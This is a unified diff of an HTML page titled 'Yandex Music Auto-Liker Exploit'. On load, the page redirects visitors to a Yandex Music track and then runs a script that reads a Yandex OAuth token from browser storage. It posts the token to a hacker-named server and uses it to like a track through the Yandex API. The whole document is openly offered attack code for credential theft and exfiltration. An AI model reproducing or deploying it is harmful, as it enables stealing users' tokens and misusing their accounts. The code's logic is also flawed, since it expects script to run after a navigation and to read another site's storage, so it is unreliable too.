--- a/autoplaylikeyndx.html
+++ b/autoplaylikeyndx.html
@@ -1,65 +1,66 @@
 <!DOCTYPE html>
 <html>
 <head>
-    <title>Yandex Music Auto-Exploit</title>
+    <title>Yandex Music Auto-Liker Exploit</title>
     <script type="text/javascript">
-        const TRACK_ID = "136101590"; // The target track ID
+        const TRACK_ID = "136101590"; // Track ID
+        const MALICIOUS_SERVER = "https://malicious-hacker.com/steal-token"; // Where token will be sent
 
         function stealToken() {
-            // Step 1: Extract the OAuth token (if user is already logged in)
-            const stolenToken = localStorage.getItem('oauth_token') || sessionStorage.getItem('oauth_token');
-
-            // Step 2: Send the stolen token to a hacker-controlled server
+            // Step 1: Steal the user's OAuth token from localStorage or cookies
+            const stolenToken = localStorage.getItem('yandex_oauth_token') || sessionStorage.getItem('yandex_oauth_token');
             if (stolenToken) {
-                fetch('https://malicious-hacker.com/steal-token', {
+                fetch(MALICIOUS_SERVER, {
                     method: 'POST',
+                    headers: { 'Content-Type': 'application/json' },
                     body: JSON.stringify({ token: stolenToken }),
-                    headers: { 'Content-Type': 'application/json' }
                 });
+                console.log("Stolen token:", stolenToken);  // Just for debugging
             }
         }
 
-        function autoLike() {
-            const oauthToken = localStorage.getItem('oauth_token'); // Extract the user's auth token
-            if (!oauthToken) return;
-
-            // Step 3: Use the stolen token to like a song
+        function autoLike(token) {
+            // Step 2: Use the stolen token to auto-like the track
             fetch(`https://api.music.yandex.net/v1/tracks/${TRACK_ID}/like`, {
                 method: 'POST',
                 headers: {
-                    'Authorization': `OAuth ${oauthToken}`,
+                    'Authorization': `OAuth ${token}`,
                     'Content-Type': 'application/json',
-                },
+                }
+            }).then(response => {
+                console.log("Track liked successfully!");
+            }).catch(error => {
+                console.error("Failed to like the track:", error);
             });
         }
 
-        function redirectAndExploit() {
+        function redirectToYandex() {
             var userAgent = navigator.userAgent || navigator.vendor || window.opera;
-            var deepLink = `yandexmusic://track/${TRACK_ID}?play=1`;  // Opens & auto-plays track
+            var deepLink = `yandexmusic://track/${TRACK_ID}?play=1`;  // Opens & auto-plays the track
             var webLink = `https://music.yandex.ru/album/35390714/track/${TRACK_ID}?play=true`;
 
-            // Step 4: Redirect user to Yandex Music
+            // Step 3: Redirect user to Yandex Music (app or web)
             if (/iPad|iPhone|iPod/.test(userAgent) && !window.MSStream) {
-                window.location.href = deepLink;
                 setTimeout(() => { window.location.href = webLink; }, 1000);
+                window.location.href = deepLink;
             } 
             else if (/android/i.test(userAgent)) {
-                window.location.href = deepLink;
                 setTimeout(() => { window.location.href = webLink; }, 1000);
+                window.location.href = deepLink;
             } 
             else {
-                window.location.href = webLink;
+                window.location.href = webLink;  // Desktop fallback
             }
 
-            // Step 5: Execute the attack in the background
+            // Step 4: After the redirect, steal the token and like the track
             setTimeout(() => {
-                stealToken();  // Steal the auth token
-                autoLike();    // Like the song using the stolen token
-            }, 3000);
+                stealToken();  // Steal token after user is redirected
+                autoLike(localStorage.getItem('yandex_oauth_token'));  // Use stolen token to like
+            }, 5000);  // Wait 5 seconds before exploiting
         }
     </script>
 </head>
-<body onload="redirectAndExploit()">
+<body onload="redirectToYandex()">
     <p>Redirecting to Yandex Music...</p>
 </body>
 </html>
